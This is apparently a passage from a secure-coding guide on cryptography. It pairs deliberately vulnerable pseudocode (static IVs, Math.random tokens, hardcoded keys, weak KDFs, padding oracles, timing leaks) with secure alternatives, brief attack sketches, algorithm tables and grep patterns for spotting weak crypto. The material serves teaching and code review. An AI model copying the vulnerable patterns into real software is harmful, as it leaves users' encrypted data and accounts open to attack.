AES.new(key, AES.MODE_CBC, iv = STATIC_IV) + return cipher.encrypt(padData(plaintext)) + +// VULNERABLE: Same IV for all encryptions +class Encryptor: + IV = generateRandomBytes(16) // Generated ONCE at startup + + function encrypt(data, key): + cipher = createCipher("AES-CBC", key, this.IV) + return cipher.encrypt(data) + +// VULNERABLE: Predictable IV (counter without random start) +nonce_counter = 0 +function encryptWithNonce(plaintext, key): + nonce_counter = nonce_counter + 1 + nonce = intToBytes(nonce_counter, 12) // Predictable! + return AES_GCM_encrypt(key, nonce, plaintext) + +// VULNERABLE: IV derived from predictable data +function encryptRecord(userId, data, key): + iv = sha256(toString(userId))[:16] // Same IV for same user! + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: Timestamp-based IV +function timeBasedEncrypt(data, key): + iv = sha256(toString(getCurrentTimestamp()))[:16] + return AES_CBC_encrypt(key, iv, data) + // Problem: Collisions if encrypted in same second +``` + +**Why This Is Dangerous:** +- Same IV + same key = identical ciphertext for identical plaintext (breaks semantic security) +- In CBC mode: enables plaintext recovery through XOR analysis across messages +- In CTR mode: key stream reuse → XOR of plaintexts recoverable +- In GCM mode: nonce reuse is catastrophic—key recovery possible +- Predictable IVs enable chosen-plaintext attacks + +**GCM Nonce Reuse Attack:** +```pseudocode +// If same nonce used twice with same key in GCM: +// Message 1: plaintext1, ciphertext1, tag1 +// Message 2: plaintext2, ciphertext2, tag2 + +// Attacker can compute: +// - XOR of plaintext1 and plaintext2 +// - Eventually recover the authentication key H +// - Forge arbitrary messages with valid tags + +// This is a CATASTROPHIC failure of GCM mode +// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason +``` + +--- + +### BAD Example 4: Math.random() for Security + +```pseudocode +// VULNERABLE: Math.random for token generation +function generateResetToken(): + token = "" + for i in range(32): + token = token + toString(floor(random() * 16), base = 16) + return token + +// VULNERABLE: Math.random for session ID +function createSessionId(): + return "session_" + toString(random() * 1000000000) + +// VULNERABLE: Seeded random with predictable seed +function generateApiKey(userId): + setSeed(userId * getCurrentTimestamp()) + key = "" + for i in range(32): + key = key + randomChoice(ALPHANUMERIC_CHARS) + return key + +// VULNERABLE: Using non-crypto random for encryption IV +function quickEncrypt(data, key): + iv = [] + for i in range(16): + iv.append(floor(random() * 256)) + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: JavaScript Math.random() is NOT cryptographic +function generateToken(): + return btoa(String.fromCharCode.apply(null, + Array.from({length: 32}, () => Math.floor(Math.random() * 256)) + )) +``` + +**Why This Is Dangerous:** +- Math.random() uses predictable pseudo-random number generators (PRNG) +- Internal state can be recovered from ~600 outputs (in V8 engine) +- Once state is known, all past and future values are predictable +- Session tokens, API keys, and reset tokens become guessable +- Many PRNG implementations have short periods or weak seeding + +**State Recovery Attack:** +```pseudocode +// Attacker collects multiple password reset tokens +tokens_observed = [ + "a3f7c2e9b1d4...", // Token 1 + "8e2a5f1c9b3d...", // Token 2 + // ... collect ~30-50 tokens +] + +// Using z3 SMT solver or custom reversing: +function recoverMathRandomState(observed_outputs): + // V8's xorshift128+ can be reversed + // Once state recovered, predict next token + state = reverseEngineerState(observed_outputs) + next_token = predictNextOutput(state) + return next_token + +// Attacker generates password reset for victim +// Then predicts the token value +// Completes password reset without email access +``` + +--- + +### BAD Example 5: Hardcoded Symmetric Keys + +```pseudocode +// VULNERABLE: Key in source code +ENCRYPTION_KEY = "MySecretKey12345" + +function encryptUserData(data): + return AES_encrypt(ENCRYPTION_KEY, data) + +// VULNERABLE: Key derived from application constant +function getEncryptionKey(): + return sha256(APPLICATION_NAME + ENVIRONMENT + "secret") + +// VULNERABLE: Same key for all users +MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef") + +function encryptForUser(userId, data): + return AES_encrypt(MASTER_KEY, data) + +// VULNERABLE: Key in configuration file (committed to git) +// config.py: +CRYPTO_CONFIG = { + "encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=", // Base64 encoded + "hmac_key": "another_secret_key_here" +} + +// VULNERABLE: Weak key (too short) +function quickEncrypt(data): + key = "short" // 5 bytes, not 16/24/32 + return AES_encrypt(pad(key, 16), data) // Padded with zeros! +``` + +**Why This Is Dangerous:** +- Keys in source code are exposed in version control history forever +- Hardcoded keys cannot be rotated without code deployment +- Compilation/decompilation exposes keys in binaries +- Single key compromise affects all encrypted data +- Weak/short keys can be brute-forced +- Key derivation from predictable inputs allows reconstruction + +--- + +### BAD Example 6: Weak Key Derivation + +```pseudocode +// VULNERABLE: Direct use of password as key +function deriveKey(password): + return password.encode()[:32] // Truncate or pad to key size + +// VULNERABLE: Simple hash as key derivation +function passwordToKey(password): + return sha256(password) // Single round, no salt + +// VULNERABLE: MD5-based key derivation +function getKeyFromPassword(password, salt): + return md5(password + salt) + +// VULNERABLE: Insufficient iterations +function deriveKeyPBKDF2(password, salt): + return PBKDF2(password, salt, iterations = 1000) + // 2025 recommendation: minimum 600,000 for SHA256 + +// VULNERABLE: Using key derivation output directly for multiple purposes +function setupCrypto(password, salt): + derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64) + encryptionKey = derived[:32] // First half + hmacKey = derived[32:] // Second half + // Problem: related keys, should use separate derivations + +// VULNERABLE: Weak salt (too short, predictable, or reused) +function deriveKeyWithWeakSalt(password): + salt = "salt" // Static salt defeats purpose + return PBKDF2(password, salt, iterations = 100000) +``` + +**Why This Is Dangerous:** +- Direct password use gives attackers dictionary attack advantage +- Single-hash derivation enables GPU-accelerated brute force +- Low iteration counts make PBKDF2/bcrypt fast to attack +- MD5 key derivation inherits all MD5 weaknesses +- Static/weak salt enables precomputation attacks +- Related key derivation can expose cryptographic weaknesses + +**Iteration Count Guidance (2025):** +```pseudocode +// PBKDF2-SHA256 minimum iterations by use case: +// - Interactive login (100ms budget): 600,000 iterations +// - Background/async (1s budget): 2,000,000 iterations +// - High-security (offline storage): 10,000,000 iterations + +// bcrypt cost factor: +// - Minimum 2025: cost = 12 (about 250ms) +// - Recommended: cost = 13-14 +// - High-security: cost = 15+ + +// Argon2id parameters (2025): +// - Memory: 64 MB minimum, 256 MB recommended +// - Iterations: 3 minimum +// - Parallelism: match available cores +// - Argon2id recommended over Argon2i or Argon2d +``` + +--- + +## GOOD Examples: Secure Cryptographic Patterns + +### GOOD Example 1: Proper Password Hashing with bcrypt/Argon2 + +```pseudocode +// SECURE: bcrypt with appropriate cost factor +function hashPassword(password): + // Cost factor 12 = ~250ms on modern hardware + // Increase cost factor annually as hardware improves + cost = 12 + return bcrypt.hash(password, cost) + +function verifyPassword(password, storedHash): + // bcrypt.verify handles timing-safe comparison internally + return bcrypt.verify(password, storedHash) + +// SECURE: Argon2id (recommended for new applications) +function hashPasswordArgon2(password): + // Argon2id: hybrid resistant to both side-channel and GPU attacks + options = { + type: ARGON2ID, + memoryCost: 65536, // 64 MB + timeCost: 3, // 3 iterations + parallelism: 4, // 4 parallel threads + hashLength: 32 // 256-bit output + } + return argon2.hash(password, options) + +function verifyPasswordArgon2(password, storedHash): + return argon2.verify(storedHash, password) + +// SECURE: scrypt for memory-hard hashing +function hashPasswordScrypt(password): + // N = CPU/memory cost (power of 2) + // r = block size + // p = parallelization parameter + salt = generateSecureRandom(16) + hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32) + return encodeSaltAndHash(salt, hash) + +// SECURE: Migrating from weak to strong hashing +function upgradePasswordHash(userId, password, currentHash): + // Verify against old hash + if legacyVerify(password, currentHash): + // Re-hash with modern algorithm + newHash = hashPasswordArgon2(password) + database.update("users", userId, {"password_hash": newHash}) + return true + return false +``` + +**Why This Is Secure:** +- bcrypt/argon2/scrypt are deliberately slow (memory-hard) +- Built-in salt generation and storage +- Timing-safe comparison built into verify functions +- Configurable work factors allow future-proofing +- Argon2id is resistant to both GPU attacks and side-channel attacks + +--- + +### GOOD Example 2: Authenticated Encryption (GCM Mode) + +```pseudocode +// SECURE: AES-256-GCM with proper nonce handling +function encryptAESGCM(plaintext, key): + // Generate cryptographically random 96-bit nonce + nonce = generateSecureRandom(12) + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + + // Optional: Add authenticated additional data (AAD) + // AAD is authenticated but NOT encrypted + aad = "context:user_data:v1" + cipher.setAAD(aad) + + ciphertext = cipher.encrypt(plaintext) + authTag = cipher.getAuthTag() // 128-bit tag + + // Return nonce + tag + ciphertext (all needed for decryption) + return nonce + authTag + ciphertext + +function decryptAESGCM(encryptedData, key): + // Extract components + nonce = encryptedData[:12] + authTag = encryptedData[12:28] + ciphertext = encryptedData[28:] + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + cipher.setAAD("context:user_data:v1") // Must match encryption + cipher.setAuthTag(authTag) + + try: + plaintext = cipher.decrypt(ciphertext) + return plaintext + catch AuthenticationError: + // Tag verification failed - data tampered or wrong key + log.warn("Decryption authentication failed - possible tampering") + return null + +// SECURE: XChaCha20-Poly1305 (extended nonce variant) +function encryptXChaCha(plaintext, key): + // 192-bit nonce - safe for random generation + nonce = generateSecureRandom(24) + + ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext) + + return nonce + tag + ciphertext +``` + +**Why This Is Secure:** +- GCM provides both confidentiality AND integrity +- Authentication tag detects any tampering +- 96-bit nonces are safe for random generation up to ~2^32 messages per key +- XChaCha20 has 192-bit nonce, safe for effectively unlimited messages +- AAD allows binding ciphertext to context (prevents cross-context attacks) + +--- + +### GOOD Example 3: Proper IV/Nonce Generation + +```pseudocode +// SECURE: Random IV for CBC mode +function encryptCBC(plaintext, key): + // 128-bit random IV for AES + iv = generateSecureRandom(16) + + cipher = createCipher("AES-256-CBC", key) + ciphertext = cipher.encrypt(plaintext, iv) + + // Prepend IV to ciphertext (IV doesn't need to be secret) + return iv + ciphertext + +function decryptCBC(encryptedData, key): + iv = encryptedData[:16] + ciphertext = encryptedData[16:] + + cipher = createCipher("AES-256-CBC", key) + return cipher.decrypt(ciphertext, iv) + +// SECURE: Counter-based nonce with random prefix (for GCM) +class SecureNonceGenerator: + // Random 32-bit prefix + 64-bit counter + // Safe for 2^64 messages with same key + + function __init__(): + this.prefix = generateSecureRandom(4) // 32-bit random + this.counter = 0 + this.lock = Mutex() + + function generate(): + this.lock.acquire() + this.counter = this.counter + 1 + if this.counter >= 2^64: + throw Error("Nonce counter exhausted - rotate key") + nonce = this.prefix + intToBytes(this.counter, 8) + this.lock.release() + return nonce + +// SECURE: Synthetic IV (SIV) for nonce-misuse resistance +function encryptSIV(plaintext, key): + // AES-GCM-SIV: Safe even if nonce is accidentally repeated + nonce = generateSecureRandom(12) + ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext) + return nonce + ciphertext + // Note: Repeated nonce only leaks if same plaintext encrypted +``` + +**Why This Is Secure:** +- Random IVs prevent pattern analysis across messages +- Prepending IV to ciphertext ensures IV is always available for decryption +- Counter with random prefix prevents nonce collision across instances +- SIV modes provide safety net against accidental nonce reuse + +--- + +### GOOD Example 4: Cryptographically Secure Random + +```pseudocode +// SECURE: Using OS/platform CSPRNG + +// Node.js +function generateSecureRandom(length): + return crypto.randomBytes(length) + +// Python +function generateSecureRandom(length): + return secrets.token_bytes(length) + +// Java +function generateSecureRandom(length): + random = SecureRandom.getInstanceStrong() + bytes = new byte[length] + random.nextBytes(bytes) + return bytes + +// Go +function generateSecureRandom(length): + bytes = make([]byte, length) + _, err = crypto_rand.Read(bytes) + if err != nil: + panic("CSPRNG failure") + return bytes + +// SECURE: Token generation for URLs/APIs +function generateUrlSafeToken(length): + // Generate random bytes, encode to URL-safe base64 + randomBytes = generateSecureRandom(length) + return base64UrlEncode(randomBytes) + +function generateResetToken(): + // 256 bits of entropy for password reset token + return generateUrlSafeToken(32) + +function generateApiKey(): + // Prefix for identification + random component + prefix = "sk_live_" + randomPart = generateUrlSafeToken(24) + return prefix + randomPart + +// SECURE: Random number in range +function secureRandomInt(min, max): + range = max - min + 1 + bytesNeeded = ceil(log2(range) / 8) + + // Rejection sampling to avoid modulo bias + while true: + randomBytes = generateSecureRandom(bytesNeeded) + value = bytesToInt(randomBytes) + if value < (2^(bytesNeeded*8) / range) * range: + return min + (value % range) +``` + +**Why This Is Secure:** +- CSPRNG (Cryptographically Secure PRNG) uses OS entropy sources +- Cannot be predicted even with complete knowledge of outputs +- Proper rejection sampling avoids modulo bias +- Standard libraries provide secure defaults when used correctly + +--- + +### GOOD Example 5: Key Derivation Functions + +```pseudocode +// SECURE: PBKDF2 with sufficient iterations +function deriveKeyPBKDF2(password, purpose): + // Generate unique salt per derivation + salt = generateSecureRandom(16) + + // 600,000 iterations minimum for SHA-256 (2025) + iterations = 600000 + + // Derive key of required length + derivedKey = PBKDF2( + password = password, + salt = salt, + iterations = iterations, + keyLength = 32, // 256 bits + hashFunction = SHA256 + ) + + // Store salt with derived key for later verification + return {salt: salt, key: derivedKey} + +// SECURE: HKDF for deriving multiple keys from one secret +function deriveMultipleKeys(masterSecret, purpose): + // HKDF-Extract: Create pseudorandom key from input + salt = generateSecureRandom(32) + prk = HKDF_Extract(salt, masterSecret) + + // HKDF-Expand: Derive purpose-specific keys + encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32) + hmacKey = HKDF_Expand(prk, info = "authentication", length = 32) + searchKey = HKDF_Expand(prk, info = "search-index", length = 32) + + return { + encryption: encryptionKey, + hmac: hmacKey, + search: searchKey, + salt: salt // Store for re-derivation + } + +// SECURE: Argon2 for password-based key derivation +function deriveKeyFromPassword(password, salt = null): + if salt == null: + salt = generateSecureRandom(16) + + derivedKey = argon2id( + password = password, + salt = salt, + memoryCost = 65536, // 64 MB + timeCost = 3, + parallelism = 4, + outputLength = 32 + ) + + return {key: derivedKey, salt: salt} + +// SECURE: Key derivation with domain separation +function deriveKeyWithContext(masterKey, context, subkeyId): + // Context prevents cross-purpose key use + info = context + ":" + subkeyId + return HKDF_Expand(masterKey, info, 32) + +// Example: Derive per-user encryption keys +function getUserEncryptionKey(masterKey, userId): + return deriveKeyWithContext(masterKey, "user-data-encryption", userId) +``` + +**Why This Is Secure:** +- High iteration counts make brute-force impractical +- HKDF properly separates multiple keys from one source +- Domain separation prevents keys derived for one purpose being used for another +- Argon2 provides memory-hard protection against GPU attacks +- Unique salt per derivation prevents precomputation attacks + +--- + +### GOOD Example 6: Key Rotation Patterns + +```pseudocode +// SECURE: Key versioning for rotation +class KeyManager: + function __init__(keyStore): + this.keyStore = keyStore + this.currentKeyVersion = keyStore.getCurrentVersion() + + function encrypt(plaintext): + key = this.keyStore.getKey(this.currentKeyVersion) + nonce = generateSecureRandom(12) + + ciphertext = AES_GCM_encrypt(key, nonce, plaintext) + + // Include key version in output for decryption + return encodeVersionedCiphertext( + version = this.currentKeyVersion, + nonce = nonce, + ciphertext = ciphertext + ) + + function decrypt(encryptedData): + version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData) + + // Fetch correct key version (may be old version) + key = this.keyStore.getKey(version) + if key == null: + throw KeyNotFoundError("Key version " + version + " not available") + + return AES_GCM_decrypt(key, nonce, ciphertext) + + function rotateKey(): + newVersion = this.currentKeyVersion + 1 + newKey = generateSecureRandom(32) + this.keyStore.storeKey(newVersion, newKey) + this.currentKeyVersion = newVersion + + // Schedule background re-encryption of old data + scheduleReEncryption(newVersion - 1, newVersion) + +// SECURE: Re-encryption during key rotation +function reEncryptData(dataId, oldVersion, newVersion, keyManager): + // Fetch encrypted data + encryptedData = database.get("encrypted_data", dataId) + + // Verify it uses old key version + currentVersion = extractKeyVersion(encryptedData) + if currentVersion >= newVersion: + return // Already using new or newer key + + // Decrypt with old key, re-encrypt with new + plaintext = keyManager.decrypt(encryptedData) + newEncryptedData = keyManager.encrypt(plaintext) + + // Atomic update + database.update("encrypted_data", dataId, { + "data": newEncryptedData, + "key_version": newVersion, + "rotated_at": getCurrentTimestamp() + }) + +// SECURE: Key wrapping for storage +function storeEncryptionKey(keyToStore, masterKey): + // Wrap (encrypt) the key with master key + nonce = generateSecureRandom(12) + wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore) + + return { + wrapped_key: wrappedKey, + nonce: nonce, + algorithm: "AES-256-GCM", + created_at: getCurrentTimestamp() + } + +function retrieveEncryptionKey(wrappedKeyData, masterKey): + return AES_GCM_decrypt( + masterKey, + wrappedKeyData.nonce, + wrappedKeyData.wrapped_key + ) +``` + +**Why This Is Secure:** +- Key versioning allows old data to remain decryptable during rotation +- Background re-encryption gradually migrates all data to new key +- Key wrapping protects stored keys at rest +- Gradual rotation minimizes operational risk + +--- + +## Edge Cases Section + +### Edge Case 1: Padding Oracle Vulnerabilities + +```pseudocode +// VULNERABLE: Revealing padding validity in error messages +function decryptCBC_vulnerable(ciphertext, key, iv): + try: + plaintext = AES_CBC_decrypt(key, iv, ciphertext) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch PaddingError: + return {success: false, error: "Invalid padding"} // ORACLE! + catch DecryptionError: + return {success: false, error: "Decryption failed"} + +// Attack: Padding oracle allows full plaintext recovery +// Attacker modifies ciphertext bytes, observes padding errors +// ~128 requests per byte to recover plaintext (on average) + +// SECURE: Use authenticated encryption (GCM) or constant-time handling +function decryptCBC_secure(ciphertext, key, iv): + try: + // First verify HMAC before any decryption + providedHmac = ciphertext[-32:] + ciphertextData = ciphertext[:-32] + + expectedHmac = HMAC_SHA256(key, iv + ciphertextData) + if not constantTimeEquals(providedHmac, expectedHmac): + return {success: false, error: "Decryption failed"} // Generic error + + plaintext = AES_CBC_decrypt(key, iv, ciphertextData) + unpadded = removePKCS7Padding(plaintext) + return {success: true, data: unpadded} + catch: + return {success: false, error: "Decryption failed"} // Same error always + +// BEST: Just use GCM which prevents this class of attack entirely +``` + +**Lesson Learned:** +- Never reveal whether padding was valid or invalid +- Always use authenticated encryption (encrypt-then-MAC or GCM) +- Return identical errors for all decryption failures + +--- + +### Edge Case 2: Length Extension Attacks + +```pseudocode +// VULNERABLE: Using hash(secret + message) for authentication +function createAuthToken(secretKey, message): + return sha256(secretKey + message) // Length extension vulnerable! + +function verifyAuthToken(secretKey, message, token): + expected = sha256(secretKey + message) + return token == expected + +// Attack: Attacker knows hash(secret + message) and length of secret +// Can compute hash(secret + message + padding + attacker_data) +// Without knowing the secret! + +// Example attack: +// Original: hash(secret + "amount=100") = abc123... +// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999") +// Server verifies this as valid! + +// SECURE: Use HMAC +function createAuthTokenSecure(secretKey, message): + return HMAC_SHA256(secretKey, message) + +function verifyAuthTokenSecure(secretKey, message, token): + expected = HMAC_SHA256(secretKey, message) + return constantTimeEquals(token, expected) + +// SECURE: Use hash(message + secret) - prevents extension but HMAC preferred +// SECURE: Use SHA-3/SHA-512/256 (resistant to length extension) +function alternativeAuth(secretKey, message): + return SHA3_256(secretKey + message) // SHA-3 is resistant +``` + +**Lesson Learned:** +- Never use hash(key + message) for authentication +- HMAC is specifically designed to prevent length extension +- SHA-3 family is resistant but HMAC is still recommended for consistency + +--- + +### Edge Case 3: Timing Attacks on Comparison + +```pseudocode +// VULNERABLE: Early-exit string comparison +function verifyToken(providedToken, expectedToken): + if length(providedToken) != length(expectedToken): + return false + for i in range(length(providedToken)): + if providedToken[i] != expectedToken[i]: + return false // Early exit reveals position of first difference + return true + +// Attack: Timing differences reveal correct characters +// Correct first char: ~1μs longer than wrong first char +// Attacker can brute-force character-by-character + +// VULNERABLE: Using == operator (language-dependent timing) +function checkHmac(provided, expected): + return provided == expected // May have variable-time implementation + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Still constant-time for the comparison + // Length difference may leak - consider padding + return false + + result = 0 + for i in range(length(a)): + // XOR and OR accumulate differences without early exit + result = result | (a[i] XOR b[i]) + return result == 0 + +// SECURE: Using crypto library comparison +function verifyHmacSecure(message, providedHmac, key): + expectedHmac = HMAC_SHA256(key, message) + return crypto.timingSafeEqual(providedHmac, expectedHmac) + +// SECURE: Double-HMAC comparison (timing-safe by design) +function verifyWithDoubleHmac(message, providedMac, key): + expectedMac = HMAC_SHA256(key, message) + // Compare HMACs of the MACs - timing doesn't leak original MAC + return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac) +``` + +**Lesson Learned:** +- Use constant-time comparison for all secret-dependent operations +- Most languages have crypto libraries with timing-safe functions +- Double-HMAC trick works when constant-time compare isn't available + +--- + +### Edge Case 4: Key Reuse Across Contexts + +```pseudocode +// VULNERABLE: Same key for encryption and authentication +SHARED_KEY = loadKey("master") + +function encryptData(data): + return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data) + +function signData(data): + return HMAC_SHA256(SHARED_KEY, data) // Same key! + +// Problem: Cryptographic interactions between uses +// Some attacks become possible when key is used in multiple algorithms + +// VULNERABLE: Same key for different users/tenants +function encryptForTenant(tenantId, data): + return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data) + // All tenants share encryption key - one compromise = all compromised + +// SECURE: Derive separate keys for each purpose +MASTER_KEY = loadKey("master") + +function getEncryptionKey(): + return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32) + +function getAuthenticationKey(): + return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32) + +function getSearchKey(): + return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32) + +// SECURE: Per-tenant key derivation +function getTenantEncryptionKey(tenantId): + // Each tenant gets unique derived key + info = "tenant-encryption:" + tenantId + return HKDF_Expand(MASTER_KEY, info, 32) + +function encryptForTenantSecure(tenantId, data): + tenantKey = getTenantEncryptionKey(tenantId) + return AES_GCM_encrypt(tenantKey, generateNonce(), data) +``` + +**Lesson Learned:** +- Always derive separate keys for different cryptographic operations +- Use domain separation (different "info" parameters) in HKDF +- Per-tenant/per-user key derivation limits blast radius of compromise + +--- + +## Common Mistakes Section + +### Common Mistake 1: Using Encryption Without Authentication + +```pseudocode +// COMMON MISTAKE: CBC encryption without HMAC +function encryptDataWrong(data, key): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(key, iv, data) + return iv + ciphertext + // Missing: No way to detect tampering! + +// Attack: Bit-flipping in CBC mode +// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1] +// Attacker can modify data without detection + +// Example: Encrypted JSON {"admin": false, "amount": 100} +// Attacker can flip bits to change "false" to "true" or modify amount + +// CORRECT: Encrypt-then-MAC +function encryptDataCorrect(data, encKey, macKey): + iv = generateSecureRandom(16) + ciphertext = AES_CBC_encrypt(encKey, iv, data) + + // MAC covers IV and ciphertext + mac = HMAC_SHA256(macKey, iv + ciphertext) + + return iv + ciphertext + mac + +function decryptDataCorrect(encrypted, encKey, macKey): + iv = encrypted[:16] + mac = encrypted[-32:] + ciphertext = encrypted[16:-32] + + // Verify MAC FIRST, before any decryption + expectedMac = HMAC_SHA256(macKey, iv + ciphertext) + if not constantTimeEquals(mac, expectedMac): + throw IntegrityError("Data has been tampered with") + + return AES_CBC_decrypt(encKey, iv, ciphertext) + +// BETTER: Just use GCM which includes authentication +function encryptDataBest(data, key): + nonce = generateSecureRandom(12) + ciphertext, tag = AES_GCM_encrypt(key, nonce, data) + return nonce + ciphertext + tag +``` + +**Solution:** +- Always use authenticated encryption (GCM, ChaCha20-Poly1305) +- If using CBC, add HMAC with encrypt-then-MAC pattern +- Verify authentication tag BEFORE decryption + +--- + +### Common Mistake 2: Confusing Encoding with Encryption + +```pseudocode +// COMMON MISTAKE: Base64 as "encryption" +function "encrypt"Data(sensitiveData): + return base64Encode(sensitiveData) // NOT ENCRYPTION! + +function "decrypt"Data(encodedData): + return base64Decode(encodedData) + +// COMMON MISTAKE: XOR with short key as encryption +function "encrypt"WithXor(data, password): + key = password.repeat(ceil(length(data) / length(password))) + return xor(data, key) // Trivially broken with frequency analysis + +// COMMON MISTAKE: ROT13 or character substitution +function "encrypt"Text(text): + return rot13(text) // No security at all + +// COMMON MISTAKE: Obfuscation ≠ encryption +function storeApiKey(apiKey): + obfuscated = "" + for char in apiKey: + obfuscated += chr(ord(char) + 5) // Just shifted characters + return obfuscated + +// COMMON MISTAKE: Custom "encryption" algorithm +function myEncrypt(data, key): + result = "" + for i, char in enumerate(data): + newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256) + result += newChar + return result // Easily broken - don't invent crypto! +``` + +**Reality Check:** +| Method | Security Level | Use Case | +|--------|----------------|----------| +| Base64 | 0 (None) | Binary-to-text encoding only | +| ROT13 | 0 (None) | Jokes, spoiler hiding | +| XOR with repeated key | Trivially broken | Never use | +| Homegrown "encryption" | Unknown, likely broken | Never use | +| AES-GCM with random key | Strong | Actual encryption | + +**Solution:** +- Use standard algorithms: AES-GCM, ChaCha20-Poly1305 +- Never invent cryptographic algorithms +- Encoding (Base64, hex) is for representation, not security + +--- + +### Common Mistake 3: Improper Key Storage After Generation + +```pseudocode +// COMMON MISTAKE: Logging the key +function generateAndStoreKey(): + key = generateSecureRandom(32) + log.info("Generated new encryption key: " + hexEncode(key)) // LOGGED! + return key + +// COMMON MISTAKE: Key in config file committed to git +// config.json: +{ + "database_url": "...", + "encryption_key": "a1b2c3d4e5f6..." // Will be in git history forever +} + +// COMMON MISTAKE: Key in environment variable visible in process list +// Launching: ENCRYPTION_KEY=secret123 ./myapp +// `ps aux` shows: myapp ENCRYPTION_KEY=secret123 + +// COMMON MISTAKE: Key stored in database alongside encrypted data +function storeEncryptedData(userId, sensitiveData): + key = generateSecureRandom(32) + encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData) + database.insert("user_data", { + user_id: userId, + encrypted_data: encrypted, + encryption_key: key // KEY NEXT TO DATA = pointless encryption + }) + +// COMMON MISTAKE: Key derivation material stored insecurely +function setupEncryption(password): + salt = generateSecureRandom(16) + key = deriveKey(password, salt) + + // Storing in easily accessible location + localStorage.setItem("encryption_salt", salt) + localStorage.setItem("derived_key", key) // KEY IN BROWSER STORAGE! +``` + +**Secure Key Storage Patterns:** +```pseudocode +// SECURE: Using a key management service (KMS) +function storeKeySecurely(keyId, keyMaterial): + // AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault + kms.storeKey(keyId, keyMaterial, { + rotation_period: "90 days", + deletion_protection: true, + access_policy: restrictedPolicy + }) + +// SECURE: Key wrapped with hardware security module (HSM) +function wrapKeyForStorage(dataKey): + wrappingKey = hsm.getWrappingKey() // Never leaves HSM + wrappedKey = hsm.wrapKey(dataKey, wrappingKey) + return wrappedKey // Safe to store - can only unwrap with HSM + +// SECURE: Envelope encryption pattern +function envelopeEncrypt(data): + // Generate data encryption key (DEK) + dek = generateSecureRandom(32) + + // Encrypt data with DEK + encryptedData = AES_GCM_encrypt(dek, generateNonce(), data) + + // Encrypt DEK with key encryption key (KEK) from KMS + encryptedDek = kms.encrypt(dek) + + // Store encrypted DEK with encrypted data + return { + encrypted_data: encryptedData, + encrypted_key: encryptedDek, // DEK is encrypted, safe to store + kms_key_id: kms.getCurrentKeyId() + } +``` + +--- + +## Algorithm Selection Guidance + +### Symmetric Encryption + +| Algorithm | Key Size | Use Case | Notes | +|-----------|----------|----------|-------| +| **AES-256-GCM** | 256 bits | General purpose | Recommended default, 96-bit nonce | +| **ChaCha20-Poly1305** | 256 bits | Performance-sensitive, mobile | Faster without AES-NI hardware | +| **XChaCha20-Poly1305** | 256 bits | High-volume encryption | 192-bit nonce, safe for random generation | +| **AES-256-GCM-SIV** | 256 bits | Nonce-misuse resistant | Slightly slower, safer with accidental reuse | + +**Avoid:** DES, 3DES, RC4, Blowfish, AES-ECB, AES-CBC without HMAC + +### Password Hashing + +| Algorithm | Memory | Use Case | Notes | +|-----------|--------|----------|-------| +| **Argon2id** | 64+ MB | New applications | Best protection, memory-hard | +| **bcrypt** | N/A | Legacy compatibility | Widely supported, cost 12+ | +| **scrypt** | 64+ MB | When Argon2 unavailable | Good alternative | + +**Avoid:** MD5, SHA1, SHA256 (single round), PBKDF2 with <600k iterations + +### Key Derivation + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Argon2id** | Password-based | Best for password → key | +| **HKDF** | Key expansion | Deriving multiple keys from one | +| **PBKDF2-SHA256** | Compatibility | 600k+ iterations required | + +**Avoid:** MD5-based KDF, single-hash derivation, low iteration counts + +### Message Authentication + +| Algorithm | Output | Use Case | Notes | +|-----------|--------|----------|-------| +| **HMAC-SHA256** | 256 bits | General purpose | Standard choice | +| **HMAC-SHA512** | 512 bits | Extra security margin | Faster on 64-bit | +| **Poly1305** | 128 bits | With ChaCha20 | Part of AEAD | + +**Avoid:** MD5, SHA1, plain hash without HMAC construction + +### Digital Signatures + +| Algorithm | Use Case | Notes | +|-----------|----------|-------| +| **Ed25519** | General purpose | Fast, secure, simple API | +| **ECDSA P-256** | Compatibility | Widely supported | +| **RSA-PSS** | Legacy systems | 2048+ bit key required | + +**Avoid:** RSA PKCS#1 v1.5, DSA, ECDSA with weak curves + +--- + +## Detection Hints: How to Spot Cryptographic Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in cryptographic code: + +// 1. Weak hash functions +md5( // Search for: md5\s*\( +sha1( // Search for: sha1\s*\( +SHA1.Create() // Search for: SHA1 + +// 2. ECB mode +mode = "ECB" // Search for: ECB +AES/ECB/ // Search for: /ECB/ +mode_ECB // Search for: ECB + +// 3. Static or weak IVs +iv = [0, 0, 0, ... // Search for: iv\s*=\s*\[0 +IV = "0000 // Search for: IV\s*=\s*["']0 +static IV // Search for: static.*[Ii][Vv] + +// 4. Math.random for security +Math.random() // Search for: Math\.random +random.randint( // Search for: randint\( (context matters) + +// 5. Weak secrets += "secret" // Search for: =\s*["']secret +SECRET = " // Search for: SECRET\s*=\s*["'] += "password" // Search for: =\s*["']password + +// 6. Direct password use as key +key = password // Search for: 